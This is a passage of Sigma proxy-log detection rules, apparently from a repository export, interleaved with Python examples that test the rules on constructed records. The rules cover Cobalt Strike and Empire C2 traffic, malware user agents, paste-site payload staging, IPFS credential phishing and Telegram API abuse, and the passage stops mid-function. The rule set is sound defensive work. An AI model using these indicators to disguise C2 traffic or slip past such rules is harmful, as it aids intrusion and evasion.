    "content": "title: Windows WebDAV User Agent\nid: e09aed7a-09e0-4c9a-90dd-f0d52507347e\nstatus: test\ndescription: Detects WebDav DownloadCradle\nreferences:\n    - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-04-06\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|startswith: 'Microsoft-WebDAV-MiniRedir/'\n        cs-method: 'GET'\n    condition: selection\nfalsepositives:\n    - Administrative scripts that download files from the Internet\n    - Administrative scripts that retrieve certain website contents\n    - Legitimate WebDAV administration\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_f5_tm_utility_bash_api_request.yml",
    "content": "title: F5 BIG-IP iControl Rest API Command Execution - Proxy\nid: b59c98c6-95e8-4d65-93ee-f594dfb96b17\nrelated:\n    - id: 85254a62-22be-4239-b79c-2ec17e566c37\n      type: similar\nstatus: test\ndescription: Detects POST requests to the F5 BIG-IP iControl Rest API \"bash\" endpoint, which allows the execution of commands on the BIG-IP\nreferences:\n    - https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash\n    - https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029\n    - https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516\nauthor: Nasreddine Bencherchali (Nextron Systems), Thurein Oo\ndate: 2023-11-08\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'POST'\n        c-uri|endswith: '/mgmt/tm/util/bash'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the BIG IP REST API to execute command for administration purposes\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_hello_world_user_agent.yml",
    "content": "title: Potential Hello-World Scraper Botnet Activity\nid: 1712bafe-be05-4a0e-89d4-17a3ed151bf5\nstatus: experimental\ndescription: |\n    Detects network traffic potentially associated with a scraper botnet variant that uses the \"Hello-World/1.0\" user-agent string.\nreferences:\n    - https://www.greynoise.io/blog/new-scraper-botnet-concentrated-in-taiwan\n    - https://viz.greynoise.io/tags/hello-world-scraper-botnet?days=30\nauthor: Joseph A. M.\ndate: 2025-08-02\ntags:\n    - attack.reconnaissance\n    - attack.t1595\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent: 'Hello-World/1.0'\n        cs-method: 'GET'\n    condition: selection\nfalsepositives:\n    - Legitimate network monitoring or vulnerability scanning tools that may use this generic user agent.\n    - Internal development or testing scripts. Consider filtering by source IP if this is expected from certain systems.\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_hktl_baby_shark_default_agent_url.yml",
    "content": "title: HackTool - BabyShark Agent Default URL Pattern\nid: 304810ed-8853-437f-9e36-c4975c3dfd7e\nstatus: test\ndescription: Detects Baby Shark C2 Framework default communication patterns\nreferences:\n    - https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-06-09\nmodified: 2024-02-15\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains: 'momyshark\\?key='\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_hktl_cobalt_strike_malleable_c2_requests.yml",
    "content": "title: HackTool - CobaltStrike Malleable Profile Patterns - Proxy\nid: f3f21ce1-cdef-4bfc-8328-ed2e826f5fac\nrelated:\n    - id: 953b895e-5cc9-454b-b183-7f3db555452e\n      type: obsolete\n    - id: 41b42a36-f62c-4c34-bd40-8cb804a34ad8\n      type: obsolete\n    - id: 37325383-740a-403d-b1a2-b2b4ab7992e7\n      type: obsolete\n    - id: c9b33401-cc6a-4cf6-83bb-57ddcb2407fc\n      type: obsolete\nstatus: test\ndescription: Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).\nreferences:\n    - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile\n    - https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100\n    - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile\n    - https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/\n    - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile\nauthor: Markus Neis, Florian Roth (Nextron Systems)\ndate: 2024-02-15\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection_amazon_1:\n        c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'\n        cs-method: 'GET'\n        c-uri: '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books'\n        cs-host: 'www.amazon.com'\n        cs-cookie|endswith: '=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996'\n    selection_amazon_2:\n        c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'\n        cs-method: 'POST'\n        c-uri: '/N4215/adj/amzn.us.sr.aps'\n        cs-host: 'www.amazon.com'\n    selection_generic_1:\n        c-useragent:\n            - 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)'\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E )'\n            - 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08'\n    selection_generic_2:\n        c-useragent|endswith: '; MANM; MANM)'\n    selection_oscp:\n        c-uri|contains: '/oscp/'\n        cs-host: 'ocsp.verisign.com'\n    selection_onedrive:\n        cs-method: 'GET'\n        c-uri|endswith: '\\?manifest=wac'\n        cs-host: 'onedrive.live.com'\n    filter_main_onedrive:\n        c-uri|startswith: 'http'\n        c-uri|contains: '://onedrive.live.com/'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
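The detection block above is the most involved one in this directory: several selections are OR-ed through `1 of selection_*`, and `filter_main_onedrive` takes hits back out. The Python below is an added example, not code from the Sigma project and not pySigma: a small evaluator for the subset of Sigma that the proxy rules on this page use (plain values with `*` and `?` wildcards, the `contains`/`startswith`/`endswith`/`all`/`re` modifiers, value lists, a selection written as a list of maps, and conditions shaped `selection`, `A and not B` or `1 of a_* and not 1 of b_*`). It runs the `selection_onedrive`, `selection_amazon_2` and `filter_main_onedrive` entries, transcribed from the rule, over constructed proxy records; the record values and the `id` keys are made up for the example. It shows that the `\?` escape keeps the `?` literal and that a record whose logged URI is an absolute URL on onedrive.live.com is suppressed by the filter, while a relative URI with the same Host still alerts.

```python
import re

# Added example; it is not the Sigma project's code and not pySigma. It covers
# the subset of Sigma the proxy rules on this page use: plain values with * and
# ? wildcards, the contains/startswith/endswith/all/re modifiers, value lists,
# a selection written as a list of maps, and conditions shaped "selection",
# "A and not B" or "1 of a_* and not 1 of b_*". The records below are constructed.

def _wildcard_to_regex(pattern: str) -> str:
    """Sigma wildcards: * -> .*, ? -> .; a backslash escapes *, ? and \\."""
    out, i = [], 0
    while i < len(pattern):
        c = pattern[i]
        if c == "\\" and i + 1 < len(pattern) and pattern[i + 1] in "*?\\":
            out.append(re.escape(pattern[i + 1]))
            i += 2
        else:
            out.append(".*" if c == "*" else "." if c == "?" else re.escape(c))
            i += 1
    return "".join(out)

def _match_value(field_value, modifiers, pattern) -> bool:
    """One log field against one rule value, honouring the modifiers."""
    if field_value is None:
        return False
    value = str(field_value)
    if "re" in modifiers:  # |re is a raw regex, case-sensitive unless it says (?i)
        return re.search(pattern, value) is not None
    body = _wildcard_to_regex(str(pattern))
    if "contains" in modifiers:
        regex = body
    elif "startswith" in modifiers:
        regex = "^" + body
    elif "endswith" in modifiers:
        regex = body + "$"
    else:  # a plain value must match the whole field, case-insensitively
        regex = "^" + body + "$"
    return re.search(regex, value, re.IGNORECASE) is not None

def _match_map(record: dict, fields: dict) -> bool:
    """All keys must match (AND); listed values are OR-ed unless |all is set."""
    for key, patterns in fields.items():
        name, *mods = key.split("|")
        values = patterns if isinstance(patterns, list) else [patterns]
        hits = [_match_value(record.get(name), mods, p) for p in values]
        if not (all(hits) if "all" in mods else any(hits)):
            return False
    return True

def match_selection(record: dict, selection) -> bool:
    """A selection given as a list of maps is an OR over those maps."""
    maps = selection if isinstance(selection, list) else [selection]
    return any(_match_map(record, m) for m in maps)

def _eval_term(record: dict, detection: dict, term: str) -> bool:
    term = term.strip()
    if term.startswith("1 of "):  # any selection whose name carries the prefix
        prefix = term[5:].rstrip("*")
        return any(match_selection(record, sel) for name, sel in detection.items()
                   if name != "condition" and name.startswith(prefix))
    return match_selection(record, detection[term])

def rule_matches(record: dict, detection: dict) -> bool:
    """Conditions shaped A, 'A and not B' or '1 of a_* and not 1 of b_*'."""
    positive, _, negative = detection["condition"].partition(" and not ")
    if not _eval_term(record, detection, positive):
        return False
    return not (negative and _eval_term(record, detection, negative))

# Two selections plus the filter, transcribed from the rule above.
CS_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
COBALT_PROFILE_DETECTION = {
    "selection_amazon_2": {"c-useragent": CS_UA, "cs-method": "POST",
                           "c-uri": "/N4215/adj/amzn.us.sr.aps", "cs-host": "www.amazon.com"},
    "selection_onedrive": {"cs-method": "GET", "cs-host": "onedrive.live.com",
                           "c-uri|endswith": "\\?manifest=wac"},  # '\?' keeps the ? literal
    "filter_main_onedrive": {"c-uri|startswith": "http",
                             "c-uri|contains": "://onedrive.live.com/"},
    "condition": "1 of selection_* and not 1 of filter_main_*",
}

# Constructed proxy records (not real traffic); the "id" key is ours.
SAMPLE_RECORDS = [
    {"id": "onedrive-relative-uri", "cs-method": "GET", "cs-host": "onedrive.live.com",
     "c-uri": "/survey/Documents?manifest=wac", "c-useragent": "Mozilla/5.0"},
    {"id": "onedrive-absolute-uri", "cs-method": "GET", "cs-host": "onedrive.live.com",
     "c-uri": "https://onedrive.live.com/survey/Documents?manifest=wac", "c-useragent": "Mozilla/5.0"},
    {"id": "amazon-post", "cs-method": "POST", "cs-host": "www.amazon.com",
     "c-uri": "/N4215/adj/amzn.us.sr.aps", "c-useragent": CS_UA},
    {"id": "benign-amazon", "cs-method": "GET", "cs-host": "www.amazon.com",
     "c-uri": "/gp/cart/view.html", "c-useragent": "Mozilla/5.0 (X11; Linux x86_64)"},
]

def alerting_ids(records=SAMPLE_RECORDS, detection=COBALT_PROFILE_DETECTION):
    """IDs the rule fires on; the absolute-URI record is dropped by the filter."""
    return [r["id"] for r in records if rule_matches(r, detection)]
```

`alerting_ids()` returns `['onedrive-relative-uri', 'amazon-post']`. The same functions evaluate the other proxy rules on this page (for example the list-of-maps selection in the Flash rule, `contains|all` in the Advanced IP Scanner rule and `selection and not filter` in the Telegram rule). Modifiers that do not occur here are not implemented, and for production use the rules should be compiled with sigma-cli/pySigma into the SIEM's own query language rather than matched in Python.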
  {
    "path": "rules/web/proxy_generic/proxy_hktl_empire_ua_uri_patterns.yml",
    "content": "title: HackTool - Empire UserAgent URI Combo\nid: b923f7d6-ac89-4a50-a71a-89fb846b4aa8\nstatus: test\ndescription: Detects user agent and URI paths used by empire agents\nreferences:\n    - https://github.com/BC-SECURITY/Empire\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-13\nmodified: 2024-02-26\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'\n        cs-uri:\n            - '/admin/get.php'\n            - '/news.php'\n            - '/login/process.php'\n        cs-method: 'POST'\n    condition: selection\nfalsepositives:\n    - Valid requests with this exact user agent to server scripts of the defined names\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_pua_advanced_ip_scanner_update_check.yml",
    "content": "title: PUA - Advanced IP/Port Scanner Update Check\nid: 1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d\nstatus: test\ndescription: Detects the update check performed by Advanced IP/Port Scanner utilities.\nreferences:\n    - https://www.advanced-ip-scanner.com/\n    - https://www.advanced-port-scanner.com/\nauthor: Axel Olsson\ndate: 2022-08-14\nmodified: 2024-02-15\ntags:\n    - attack.discovery\n    - attack.reconnaissance\n    - attack.t1590\nlogsource:\n    category: proxy\ndetection:\n    selection:\n      # Example request: http://www.advanced-port-scanner.com/checkupdate.php?lng=en&ver=2-5-3680&beta=n&type=upd&rmode=p&product=aps\n      # Example request2: http://www.advanced-ip-scanner.com/checkupdate.php?lng=en&ver=2-5-3499&beta=n&type=upd&rmode=p&product=aips\n        c-uri|contains: '/checkupdate.php'\n        c-uri-query|contains|all:\n            - 'lng='\n            - 'ver='\n            - 'beta='\n            - 'type='\n            - 'rmode='\n            - 'product='\n    condition: selection\nfalsepositives:\n    - Expected if you legitimately use the Advanced IP or Port Scanner utilities in your environment.\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_pwndrop.yml",
    "content": "title: PwnDrop Access\nid: 2b1ee7e4-89b6-4739-b7bb-b811b6607e5e\nstatus: test\ndescription: Detects downloads from PwnDrop web servers developed for red team testing and most likely also used for criminal activity\nreferences:\n    - https://breakdev.org/pwndrop/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-04-15\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.t1102.001\n    - attack.t1102.003\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains: '/pwndrop/'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_raw_paste_service_access.yml",
    "content": "title: Raw Paste Service Access\nid: 5468045b-4fcc-4d1a-973c-c9c9578edacb\nstatus: test\ndescription: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form\nreferences:\n    - https://www.virustotal.com/gui/domain/paste.ee/relations\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-12-05\nmodified: 2023-01-19\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.t1102.001\n    - attack.t1102.003\n    - attack.defense-evasion\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains:\n            - '.paste.ee/r/'\n            - '.pastebin.com/raw/'\n            - '.hastebin.com/raw/'\n            - '.ghostbin.co/paste/*/raw/'\n            - 'pastetext.net/'\n            - 'pastebin.pl/'\n            - 'paste.ee/'\n    condition: selection\nfalsepositives:\n    - User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste)\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_susp_flash_download_loc.yml",
    "content": "title: Flash Player Update from Suspicious Location\nid: 4922a5dd-6743-4fc2-8e81-144374280997\nstatus: test\ndescription: Detects a flashplayer update from an unofficial location\nreferences:\n    - https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-10-25\nmodified: 2022-08-08\ntags:\n    - attack.initial-access\n    - attack.t1189\n    - attack.execution\n    - attack.t1204.002\n    - attack.defense-evasion\n    - attack.t1036.005\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        - c-uri|contains: '/flash_install.php'\n        - c-uri|endswith: '/install_flash_player.exe'\n    filter:\n        cs-host|endswith: '.adobe.com'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown flash download locations\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_susp_ipfs_cred_harvest.yml",
    "content": "title: Suspicious Network Communication With IPFS\nid: eb6c2004-1cef-427f-8885-9042974e5eb6\nstatus: test\ndescription: Detects connections to interplanetary file system (IPFS) containing a user's email address which mirrors behaviours observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.\nreferences:\n    - https://blog.talosintelligence.com/ipfs-abuse/\n    - https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11\n    - https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638\nauthor: Gavin Knapp\ndate: 2023-03-16\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1056\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-uri|re: '(?i)(ipfs\\.io/|ipfs\\.io\\s).+\\..+@.+\\.[a-z]+'\n    condition: selection\nfalsepositives:\n    - Legitimate use of IPFS being used in the organisation. However the cs-uri regex looking for a user email will likely negate this.\nlevel: low\n"
  },
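The rule above rests entirely on one regular expression, so the useful check is to run that expression over the URL shapes seen in IPFS credential-harvesting pages. The Python below is an added example, not code from the Sigma project: it compiles the `cs-uri|re` value verbatim and evaluates it against constructed URIs (the CID is a placeholder, the addresses are example.com). The point it makes is that `.+\..+@` demands a dot somewhere between the gateway path and the `@`, so an address appended to a dotless CID path or passed in a query string only matches when the local part itself contains a dot, while `.../index.html#victim@example.com` matches as intended.

```python
import re

# Added example, not the Sigma project's code: runs the rule's cs-uri regex,
# copied verbatim from above, against constructed URIs (not real log data) so
# it is clear which URL shapes it does and does not cover.

IPFS_REGEX = re.compile(r"(?i)(ipfs\.io/|ipfs\.io\s).+\..+@.+\.[a-z]+")


def ipfs_uri_carries_email(cs_uri: str) -> bool:
    """Sigma's |re modifier is an unanchored match, hence re.search."""
    return IPFS_REGEX.search(cs_uri) is not None


# Constructed URIs; "QmPlaceholderCid" stands in for a real content ID.
SAMPLE_URIS = {
    "index-html-fragment": "https://ipfs.io/ipfs/QmPlaceholderCid/index.html#victim@example.com",
    "dotted-local-part": "https://ipfs.io/ipfs/QmPlaceholderCid/#first.last@example.com",
    "plain-local-part-dotless-path": "https://ipfs.io/ipfs/QmPlaceholderCid/#victim@example.com",
    "email-in-query": "https://ipfs.io/ipfs/QmPlaceholderCid/?email=victim@example.com",
    "no-email": "https://ipfs.io/ipfs/QmPlaceholderCid/index.html",
    "other-gateway": "https://cloudflare-ipfs.com/ipfs/QmPlaceholderCid/index.html#victim@example.com",
}


def matching_uri_labels(uris=SAMPLE_URIS):
    """Labels of the constructed URIs the rule's regex matches."""
    return [label for label, uri in uris.items() if ipfs_uri_carries_email(uri)]
```

`matching_uri_labels()` returns `['index-html-fragment', 'dotted-local-part']`: the two dotless-path variants and the non-ipfs.io gateway are not matched. Whether that is acceptable depends on the phishing kits seen in the environment; the test makes the trade-off visible before the rule is tuned.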
  {
    "path": "rules/web/proxy_generic/proxy_telegram_api.yml",
    "content": "title: Telegram API Access\nid: b494b165-6634-483d-8c47-2026a6c52372\nstatus: test\ndescription: Detects suspicious requests to Telegram API without the usual Telegram User-Agent\nreferences:\n    - https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\n    - https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/\n    - https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-06-05\nmodified: 2023-05-18\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.t1102.002\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-host: 'api.telegram.org' # Often used by Bots\n    filter:\n        c-useragent|contains:\n            # Used https://core.telegram.org/bots/samples for this list\n            - 'Telegram'\n            - 'Bot'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate use of Telegram bots in the company\nlevel: medium\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_apt.yml",
    "content": "title: APT User Agent\nid: 6ec820f2-e963-4801-9127-d8b2dce4d31b\nstatus: test\ndescription: Detects suspicious user agent strings used in APT malware in proxy logs\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems), Markus Neis\ndate: 2019-11-12\nmodified: 2024-02-15\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent:\n         # APT Related\n            - 'SJZJ (compatible; MSIE 6.0; Win32)' # APT Backspace\n            - 'Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0' # APT GrizzlySteppe - ChopStick - US CERT https://www.cisa.gov/news-events/alerts/2017/02/10/enhanced-analysis-grizzly-steppe\n            - 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC' # Comment Crew Miniasp\n            - 'Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)' # Comment Crew Miniasp\n            - 'webclient' # Naikon APT\n            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200' # Naikon APT\n            - 'Mozilla/4.0 (compatible; MSI 6.0;' # SnowGlobe Babar - yes, it is cut\n            - 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0' # Sofacy - Xtunnel\n            - 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/' # Sofacy - Xtunnel\n            - 'Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2' # Sofacy - Xtunnel\n            - 'Mozilla/4.0' # Derusbi backdoor ELF https://github.com/fideliscyber/indicators/tree/master/FTA-1021\n            - 'Netscape' # Unit78020 Malware\n            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7' # Unit78020 Malware\n            - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Firefox/3.6.13 GTB7.1' # Winnti related\n            - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; 
Trident/5.0)' # Winnti related\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)' # APT17\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)' # Bronze Butler - Daserf\n            - 'Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)' # Bronze Butler - Daserf\n            - 'Mozilla/4.0 (compatible; MSIE 8.0; Win32)' # TSCookie https://app.any.run/tasks/0996b314-5133-491b-8d23-d431ffdec597\n            - 'Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1' # Delphi downloader https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\n            - 'Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)' # VPNFilter https://blog.talosintelligence.com/2018/05/VPNFilter.html\n            - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)' # Sofacy User-Agent https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\n            - 'Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko' # Sofacy User-Agent https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/\n            - 'Mozilla v5.1 *' # Sofacy Zebrocy samples\n            - 'MSIE 8.0' # Sofacy Azzy Backdoor  from https://www.hybrid-analysis.com/sample/a80e29c0757bee05338fd5c22a542d852ad86c477068e3eb4aacc1c3e59e2eef?environmentId=100\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)' # https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html\n            - 'Mozilla/4.0 (compatible; RMS)' # Attacks on industrial enterprises using RMS and TeamViewer - 
https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer/87104/\n            - 'Mozilla/4.0 (compatible; MSIE 6.0; DynGate)' # Attacks on industrial enterprises using RMS and TeamViewer - https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer/87104/\n            - 'O/9.27 (W; U; Z)' # Cmstar https://www.virustotal.com/#/file/e4328011bb2b04abc856ccd04404c9f95d67167f6c291d343e8ffa8aa2aa2099/details\n            - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0*' # KerrDown UA\n            - 'Mozilla/5.0 (Windows NT 9; *' # Suspicious 'Windows NT 9' user agent - used by APT33 malware in 2018\n            - 'hots scot' # Unknown iOS zero-day implant https://twitter.com/craiu/status/1176437994288484352?s=20\n            - 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT)' # https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/\n            - 'Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36' # Hidden Cobra malware\n            - 'Mozilla/5.0 (Windows NT 6.2; Win32; rv:47.0)' # Strong Pity loader https://twitter.com/VK_Intel/status/1264185981118406657\n            - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;' # Mustang Panda https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/\n            - 'Mozilla/5.0 (X11; Linux i686; rv:22.0) Firefox/22.0' # BackdoorDiplomacy https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/\n            - 'Mozilla/5.0 Chrome/72.0.3626.109 Safari/537.36' # SideWalk malware used by Sparkling Goblin\n            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:FTS_06) Gecko/22.36.35.06 Firefox/2.0' # LitePower stager used by WIRTE https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044/\n            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 
Edg/100.0.1185.39' # https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)' # https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/\n            - 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)' # PlugX backdoor https://unit42.paloaltonetworks.com/thor-plugx-variant/\n            - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246001'  # RedCurl Downloader APT https://www.facct.ru/blog/redcurl-2024\n    condition: selection\nfalsepositives:\n    - Old browsers\nlevel: high\n"
  },
  {
    "path": "rules/web/proxy_generic/proxy_ua_base64_encoded.yml",
    "content": "title: Suspicious Base64 Encoded User-Agent\nid: d443095b-a221-4957-a2c4-cd1756c9b747\nrelated:\n    - id: 894a8613-cf12-48b3-8e57-9085f54aa0c3\n      type: derived\nstatus: test\ndescription: Detects suspicious encoded User-Agent strings, as seen used by some malware.\nreferences:\n    - https://deviceatlas.com/blog/list-of-user-agent-strings#desktop\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent|startswith:\n            - 'Q2hyb21l' # Chrome Encoded with offset to not include padding\n            - 'QXBwbGVXZWJLaX' # AppleWebKit Encoded with offset to not include padding\n            - 'RGFsdmlr' # Dalvik Encoded with offset to not include padding\n            - 'TW96aWxsY'  # Mozilla Encoded with offset to not include padding (as used by YamaBot)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
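The four `startswith` values above are base64 cut at an "offset" so that no padding and no character that depends on the following byte is included. The Python below is an added example, not code from the Sigma project: it recomputes those stable prefixes from the plaintext words (Chrome, AppleWebKit, Dalvik, Mozilla), checks that the rule's literals are exactly the stable length, and decodes a matching User-Agent for the analyst. The sample User-Agent strings it encodes are constructed for the example.

```python
import base64
import binascii

# Added example, not the Sigma project's code: it recomputes the "offset"
# base64 prefixes the rule above matches on and shows why they are safe to
# use as startswith patterns whatever text follows the encoded word.


def stable_b64_prefix(prefix: bytes) -> str:
    """Leading base64 characters that depend only on `prefix`.

    Base64 turns each 3-byte group into 4 characters. A full group fixes 4
    characters; one leftover byte fixes 1 more (its top 6 bits); two leftover
    bytes fix 2 more. Anything beyond that depends on the next byte, which is
    why the rule stops at 'TW96aWxsY' rather than at 'TW96aWxsYS8'."""
    full, rem = divmod(len(prefix), 3)
    stable_len = full * 4 + rem  # 0, 1 or 2 extra characters
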